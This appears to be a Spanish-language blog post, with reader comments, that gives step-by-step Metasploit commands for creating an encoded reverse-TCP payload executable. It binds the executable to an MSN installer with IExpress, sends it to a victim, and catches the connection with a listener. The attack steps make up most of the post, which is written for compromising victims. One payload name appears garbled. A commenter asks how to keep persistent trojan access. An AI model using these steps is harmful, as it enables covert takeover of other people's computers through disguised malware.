Bueno... Recorriendo la web me encuentro con este video que es bastante simple y que explica muy bien como transformar un PAYLOAD a exe y como unirlo a un Instalador de MSN con Iexpress. Para luego enviárselo a la víctima y se conecte a nosotros gracias al PAYLOAD [windows/exploits/reverse_tcp] que crea una conexión inversa (osea que nuestra víctima se conecta a nosotros), lo que es muy práctico para evitar el firewall de Windows. Aquí el video, y luego procedo a explicar a los que no les haya quedado muy claro ya que el video está en inglés, pero muy fácil de entender:
Primero se procede a crear el PAYLOAD con extensión *.exe:
root@evilbox:~# cd /pentest/exploits/framework3/
root@evilbox:/pentest/exploits/framework3# ./msfpayload windows/exploits/reverse_tcp LHOST=192.168.1.64 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/payload.exe
En LHOST=192.168.1.64 se tiene que poner nuestra IP ya que la victima se va a conectar a nosotros.En -o se pone la ruta donde se guardará el payload.exe, puede ser donde sea.
Se deja corriendo en la consola metasploit:
root@evilbox:/pentest/exploits/framework3# ./msfconsole
Luego se procede a unir payload.exe con el instalador de MSN o en su defecto cualquier exe. No voy a entrar en detalles como usar Iexpress ya que en el video es muy claro.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/exploits/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.64
msf exploit(handler) > exploit
Aquí lo único lo que hay cambiar es set LHOST 192.168.1.64 por nuestra IP, como ya expliqué antes. es para que nuestra víctima se conecta a nosotros.
Corremos el exploit con el comando exploit (obvio no XD)
Por último sólo nos queda enviar el "*.exe" (payload.exe + Instalador de MSN) a nuestra víctima y esperar que lo ejecute.
Ahora tenemos el control absoluto desde nuesta consola del PC de tu víctima.
[+] Salu2
[+] ZioneR
Excelente... Me encanto el video y la explicacion
ResponderEliminar+1 :P
Gracias!! hey una cosa, despues que la victima ejecutase el payload la conexion se pierde la conexion ? cuando si es asi ? se mete en el sector de arranque de inicio de windows como un troyano y sigues teniendo la sesion del meterpreter ?
ResponderEliminar